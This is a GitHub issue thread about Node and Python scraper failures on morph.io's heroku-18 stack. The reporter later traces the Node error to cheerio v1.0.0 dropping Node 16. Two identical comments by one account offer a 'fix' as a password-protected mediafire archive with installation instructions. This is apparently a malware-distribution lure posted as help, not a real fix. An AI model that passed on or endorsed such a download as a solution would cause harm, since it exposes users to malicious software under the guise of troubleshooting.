### ISSUE TITLE
Node & Python failing.

### ISSUE THREAD

**Issue by atompkins** [openaustralia/morph#1333]
Node:
ReferenceError: ReadableStream is not defined

Python:
Requested runtime (python-2.7.16) is not available for this stack (heroku-18).

These appear to have started 2-3 days ago. I assume it's because heroku-18 is long since out of support.
Perl and Ruby scrapers seem to be fine.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by atompkins** [comment]
I should probably add that the node issue was cheerio went to v1.0.0 and deprecated support for node v16.x

not sure about the python problem, seems like a coincidence.
